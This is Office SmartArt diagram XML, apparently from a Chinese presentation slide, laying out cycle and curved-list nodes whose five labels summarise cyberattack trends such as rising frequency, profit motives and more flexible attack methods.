    <dgm:cxn modelId="{0B4194F3-BA17-4F86-BEA1-2E0C411FAF8C}" type="presOf" srcId="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" destId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{08802141-0817-4E20-B2E9-DA7BE271BCF2}" srcId="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" destId="{B5A555E6-A22D-4BDE-ADB9-19C408921F67}" srcOrd="3" destOrd="0" parTransId="{509EA31B-734B-457C-BBEB-6EF754342603}" sibTransId="{2E166C75-4F59-483A-8BBB-ACBAE8E8CD60}"/>
    <dgm:cxn modelId="{697A202C-5488-4596-AF0D-15B8C056E04A}" type="presOf" srcId="{F61D691F-D765-4A59-8B2B-36329AA6E973}" destId="{F419E279-6D5A-4A54-87E6-D345D788E1AC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{968B8B62-7C20-483E-9983-5DDA368F6E59}" srcId="{2BCBF375-7988-41D9-86E5-2B966C013A6D}" destId="{39FD9775-B92E-4EE8-A4FD-0C99D0DD00A3}" srcOrd="5" destOrd="0" parTransId="{94CA8666-1204-4130-8D4F-D9C8020B58AB}" sibTransId="{65F7C055-E17A-4F3F-AE14-4ABADEA0963B}"/>
    <dgm:cxn modelId="{24D0135A-A2C0-4945-BC34-58FA35AAA890}" type="presOf" srcId="{2628547F-A1CA-4A16-AB22-68B9710291A9}" destId="{63B1C6D5-9295-497C-9AE9-851C8430DE8C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{01EED931-1E6B-46B7-97EF-D64126AD95D2}" type="presOf" srcId="{ACFCAD90-C360-414B-916B-9C9D664942D9}" destId="{E1320394-93FB-4B7B-83CD-6624DC5D8519}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{CC3CDEFA-995D-4A8B-A755-A4943C53B7E5}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{5DEB8CE9-8E9A-419A-B7CF-0359D290A74D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{FB530B64-0373-489C-8EBF-99F86AB642C2}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{3F537CC9-4970-4416-94A2-06BCE052438D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{F6066CDD-5D34-41BC-83E3-9DE102E3D2EC}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{9DDF6065-8515-4E3C-99ED-F1E2582B16EA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{E278B0DC-C065-44A2-922E-7CD13CACEC8B}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{8E7B7568-A305-4178-B001-39E2FE0602E6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{20E2D7BC-E897-45D4-B01E-E32BF2E0807B}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{585117AF-691A-4244-9B32-63942D9F1899}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{3C3DF867-54E2-45AF-9EB9-A7383814D6D8}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{5BFDA040-6203-444E-AD9F-4C7600D13812}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{55639291-73DF-44DC-9345-3A8A20BF0131}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{E2DCA58B-F0B7-49F1-85D0-468203E4BECA}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{56550B3B-279A-4B8B-BEC5-8874F65F48A3}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{E1320394-93FB-4B7B-83CD-6624DC5D8519}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{A7AE5190-D1B7-4321-B0AC-8773EDFCB714}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{F419E279-6D5A-4A54-87E6-D345D788E1AC}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{01BF699B-3225-4F2B-9E87-AE1618C0E87D}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{53939A57-58F7-4663-A667-D09E94DC4359}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{6A7B15EA-D88A-42F8-958E-C5F68E6DAB4E}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{EF977A51-127C-4DC4-9236-1B2EB7CE8742}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{150F9780-0AE6-49B0-9330-3C3BCFA7215E}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{F6317062-5B51-4FA3-BF9D-B15B29B330DF}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{8D2F29A4-1534-43AC-B460-4C90D34C4776}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{E5B4EF1A-92C2-42DC-AEAC-0ACDD620F72E}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{A0804E8C-7552-4EF1-B7E1-6C20B1672FE1}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{F1E5E2EB-7A38-40C7-98D2-5FB200D03374}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{00ADCDA0-8AB3-46F5-A1BA-EEA12C2BBEAE}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{D3C325FC-04CD-4FF3-834D-8E9524481AE2}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{628638FF-6A07-45EA-A197-91C701E8273E}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{BE766A88-0B2A-4BCC-BB66-27CC269C1127}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{55F13906-9219-47F7-9237-F9E64BE19A68}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{63B1C6D5-9295-497C-9AE9-851C8430DE8C}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{A0E5C114-192B-487F-8912-35325C6A64FE}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{7C0951D6-B7DB-474E-B1FD-3D388636F111}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{346E5E21-FA5B-4FE6-A7D7-6A5429514DA2}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{32DAC9DF-280E-4EF6-9EC5-1A28A639B7B5}" srcOrd="18" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{C7CB49C8-6A4C-4B7B-893D-098988381FD0}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{812B6C51-308F-42B0-838F-594E63465799}" srcOrd="19" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{CBF328D9-8216-4119-B76D-F731253E4D3E}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{483C9DFB-BBFF-4ABF-98A9-3FED709CB8C5}" srcOrd="20" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{59D77B5E-DF2B-4C6F-9C7B-60B7849AD84B}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{936AAB34-7065-44EB-81EE-80354A99163D}" srcOrd="21" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{A4FA0A8B-9852-437E-ACAA-26C2D1385A1F}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{1D152899-987C-4B74-8BEA-D24CEDE6A2C3}" srcOrd="22" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{A2FC48B3-0060-4951-A212-10D98ECAA15B}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{9A3CB984-5310-4031-B503-165D8B8A8F4B}" srcOrd="23" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{E8E44B8C-6098-4BE0-9B77-FD8FF4C1E860}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{C50E6F7D-692E-456B-80C1-C98A215A9660}" srcOrd="24" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{691EE76A-E408-4BBE-9FDA-ED1930206876}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{8FF528D9-C741-4651-AC78-12039CD05A75}" srcOrd="25" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{B9F7BE7E-594A-4A7D-A5B9-FB7AD18D1EDC}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{AF67D5C6-8F6F-4D8D-927A-196DC0748257}" srcOrd="26" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{6DDE0F2E-DD73-4211-A93C-53D95B646A37}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{B9A5A383-6545-4C0B-B89D-C9F93BE5FAE2}" srcOrd="27" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{E08A9B01-681E-4349-9AEB-8CE641B09789}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{E1827485-9CF7-433F-85D2-84AAFECF8CB9}" srcOrd="28" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{D3CFC363-F4DF-467B-A498-4903559A5889}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{37FF4C0C-07CA-4360-9CCC-0839560305D4}" srcOrd="29" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{B058D70B-0581-4C83-821C-3B7CC5ED27C8}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{68A1BF9D-4FA0-4920-ABA5-E78B58FC6388}" srcOrd="30" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{E5224037-3DF9-4C4F-B33C-A8CE1A4E5BA0}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{126824D2-FA2A-48C6-B206-F59F5E616C9D}" srcOrd="31" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{362FD882-7E91-4580-8DBE-20AA7C19826A}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{C10B1A54-E60C-400B-BA39-66318D41FE97}" srcOrd="32" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{BDF583F5-8BCC-4F57-A0E6-2607F5477442}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{AC00AA75-14DD-4E9F-B12B-A0DBFA93796E}" srcOrd="33" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{91BCE943-CCE2-4F2F-8CB2-F362A9935D08}" type="presParOf" srcId="{79408B4B-6DB8-4701-AE22-D27A3083008B}" destId="{10EB642D-F402-426A-860E-7A6ED20615E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9F7859-6EFA-441D-AF3A-050E14086DC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9EBA68-491C-4979-88CA-A31AFC0469D5}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>频率更高</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{341EB3F8-7962-407D-BF44-B19B74F448F9}" type="parTrans" cxnId="{E5CB7A55-47F0-44DD-8E9A-763E380AC9FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD0951B8-BA6F-44B0-AB8E-6859FECC8EC1}" type="sibTrans" cxnId="{E5CB7A55-47F0-44DD-8E9A-763E380AC9FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC459506-B1C3-455D-AC02-E4F093140D46}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>产业链依然活跃</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{991128E5-2EE2-4230-9058-E0F79D81F280}" type="parTrans" cxnId="{A424D650-643D-4909-833E-F2E10A120CFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7809FD26-E19E-4991-8870-8F50F34EBDD6}" type="sibTrans" cxnId="{A424D650-643D-4909-833E-F2E10A120CFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72B43B28-2F0A-4661-A520-F0D974A6F845}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>利益驱动明显</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97D60F69-9FCE-4D15-B92E-4C62664863C3}" type="parTrans" cxnId="{C7290F7C-C0F5-4C1B-BCD3-66352F4011F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{523C40E4-B267-4A17-A609-27B0427CCEF7}" type="sibTrans" cxnId="{C7290F7C-C0F5-4C1B-BCD3-66352F4011F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACADEDB2-74EB-4BD2-81DF-E39AAF038932}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>攻击类型混杂化</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3270F624-588A-4521-AD31-C3F524FCA1A0}" type="parTrans" cxnId="{B5F0F2BA-A378-48BB-88D1-5B105221D7C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{271E9379-8FF3-4A30-AF49-6335CC447A3B}" type="sibTrans" cxnId="{B5F0F2BA-A378-48BB-88D1-5B105221D7C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D11AD88-1C57-4922-9F9A-BD4C5C480BE1}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>攻击手段更加灵活</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56F56F92-9624-4712-A73F-B1C3CA2E669B}" type="parTrans" cxnId="{5FB11E49-C3ED-4AD9-924D-E998145E0148}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F67AADE5-D141-46D9-BC64-697D88A8DF9C}" type="sibTrans" cxnId="{5FB11E49-C3ED-4AD9-924D-E998145E0148}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{068BC06A-A9E1-47BB-8A8A-5F003B0BB63C}" type="pres">
      <dgm:prSet presAssocID="{BC9F7859-6EFA-441D-AF3A-050E14086DC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6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" type="pres">
      <dgm:prSet presAssocID="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A679D43-DC5F-4DCD-AB0B-467CA612DEDF}" type="pres">
      <dgm:prSet presAssocID="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" presName="cycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74C9D9A0-E996-4FE9-A0D6-2A03A2BFEA3A}" type="pres">
      <dgm:prSet presAssocID="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" presName="srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6041AFDA-EBAF-4752-94D8-CE63AD2CFE30}" type="pres">
      <dgm:prSet presAssocID="{BC9F7859-6EFA-441D-AF3A-050E14086DCC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8DD400A7-4821-4A46-A0BB-9B41FF75954A}" type="pres">
      <dgm:prSet presAssocID="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" presName="extraNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{479A99FB-8831-4239-992B-0D54D250408E}" type="pres">
      <dgm:prSet presAssocID="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" presName="dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{908BCF92-A2B9-445C-BE8D-D11E1D4DC950}" type="pres">
      <dgm:prSet presAssocID="{BA9EBA68-491C-4979-88CA-A31AFC0469D5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632678-F8F9-47E2-B69B-3FAF485009F0}" type="pres">
      <dgm:prSet presAssocID="{BA9EBA68-491C-4979-88CA-A31AFC0469D5}" presName="accent_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8520B2E3-C03C-460C-8050-9708E766D15C}" type="pres">
      <dgm:prSet presAssocID="{BA9EBA68-491C-4979-88CA-A31AFC0469D5}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A56AE343-3CD2-43DA-BD3C-A08CE9249182}" type="pres">
      <dgm:prSet presAssocID="{CC459506-B1C3-455D-AC02-E4F093140D46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52A352-BD81-479A-BD4A-B6BB8D6460CE}" type="pres">
      <dgm:prSet presAssocID="{CC459506-B1C3-455D-AC02-E4F093140D46}" presName="accent_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13CEC376-D801-4AE9-BFC0-2F576EE7D0F2}" type="pres">
      <dgm:prSet presAssocID="{CC459506-B1C3-455D-AC02-E4F093140D46}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC9565B7-7F26-4D8B-A13B-475B32BBBA16}" type="pres">
      <dgm:prSet presAssocID="{72B43B28-2F0A-4661-A520-F0D974A6F84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95EF31-73EF-4185-B7E6-C29ED1D86A6F}" type="pres">
      <dgm:prSet presAssocID="{72B43B28-2F0A-4661-A520-F0D974A6F845}" presName="accent_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C89F9AE4-2EC7-44BB-BA56-32656C66E8C7}" type="pres">
      <dgm:prSet presAssocID="{72B43B28-2F0A-4661-A520-F0D974A6F845}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DFA1AFDB-3919-442D-A456-8341E003BBAD}" type="pres">
      <dgm:prSet presAssocID="{ACADEDB2-74EB-4BD2-81DF-E39AAF03893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C23581-77A9-4D86-BF06-7DA76FA39761}" type="pres">
      <dgm:prSet presAssocID="{ACADEDB2-74EB-4BD2-81DF-E39AAF038932}" presName="accent_4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{624F20A6-BB97-4E50-A9FE-F5DEF3EE7D4C}" type="pres">
      <dgm:prSet presAssocID="{ACADEDB2-74EB-4BD2-81DF-E39AAF038932}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E4390D3-34B7-4A27-86EC-E7CB4B164511}" type="pres">
      <dgm:prSet presAssocID="{1D11AD88-1C57-4922-9F9A-BD4C5C480BE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4CB173-B5FE-4930-B27C-734E47A46D9A}" type="pres">
      <dgm:prSet presAssocID="{1D11AD88-1C57-4922-9F9A-BD4C5C480BE1}" presName="accent_5" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5C46165D-6AEA-4D3C-A721-551BD07B525C}" type="pres">
      <dgm:prSet presAssocID="{1D11AD88-1C57-4922-9F9A-BD4C5C480BE1}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{FA9B381E-4DDC-254D-99EC-456D152EF965}" type="presOf" srcId="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" destId="{068BC06A-A9E1-47BB-8A8A-5F003B0BB63C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{5FB11E49-C3ED-4AD9-924D-E998145E0148}" srcId="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" destId="{1D11AD88-1C57-4922-9F9A-BD4C5C480BE1}" srcOrd="4" destOrd="0" parTransId="{56F56F92-9624-4712-A73F-B1C3CA2E669B}" sibTransId="{F67AADE5-D141-46D9-BC64-697D88A8DF9C}"/>
    <dgm:cxn modelId="{295F0BC0-C3B4-434B-93C0-F076D40BF8C0}" type="presOf" srcId="{CC459506-B1C3-455D-AC02-E4F093140D46}" destId="{A56AE343-3CD2-43DA-BD3C-A08CE9249182}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{B161BBFE-9A48-4F4B-AD79-44C1785F22A6}" type="presOf" srcId="{AD0951B8-BA6F-44B0-AB8E-6859FECC8EC1}" destId="{6041AFDA-EBAF-4752-94D8-CE63AD2CFE30}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{E5CB7A55-47F0-44DD-8E9A-763E380AC9FE}" srcId="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" destId="{BA9EBA68-491C-4979-88CA-A31AFC0469D5}" srcOrd="0" destOrd="0" parTransId="{341EB3F8-7962-407D-BF44-B19B74F448F9}" sibTransId="{AD0951B8-BA6F-44B0-AB8E-6859FECC8EC1}"/>
    <dgm:cxn modelId="{A9F54E7C-FA23-EE49-8A6C-4A39DAEA491B}" type="presOf" srcId="{72B43B28-2F0A-4661-A520-F0D974A6F845}" destId="{FC9565B7-7F26-4D8B-A13B-475B32BBBA16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{84285A1E-4226-8F4E-875A-0DA8010C687E}" type="presOf" srcId="{1D11AD88-1C57-4922-9F9A-BD4C5C480BE1}" destId="{1E4390D3-34B7-4A27-86EC-E7CB4B164511}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{B5F0F2BA-A378-48BB-88D1-5B105221D7C7}" srcId="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" destId="{ACADEDB2-74EB-4BD2-81DF-E39AAF038932}" srcOrd="3" destOrd="0" parTransId="{3270F624-588A-4521-AD31-C3F524FCA1A0}" sibTransId="{271E9379-8FF3-4A30-AF49-6335CC447A3B}"/>
    <dgm:cxn modelId="{A424D650-643D-4909-833E-F2E10A120CFC}" srcId="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" destId="{CC459506-B1C3-455D-AC02-E4F093140D46}" srcOrd="1" destOrd="0" parTransId="{991128E5-2EE2-4230-9058-E0F79D81F280}" sibTransId="{7809FD26-E19E-4991-8870-8F50F34EBDD6}"/>
    <dgm:cxn modelId="{EE19B736-7750-E340-8365-FAECF767F178}" type="presOf" srcId="{BA9EBA68-491C-4979-88CA-A31AFC0469D5}" destId="{908BCF92-A2B9-445C-BE8D-D11E1D4DC950}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{17784968-884F-2143-82CC-99DAC7F7D1DB}" type="presOf" srcId="{ACADEDB2-74EB-4BD2-81DF-E39AAF038932}" destId="{DFA1AFDB-3919-442D-A456-8341E003BBAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
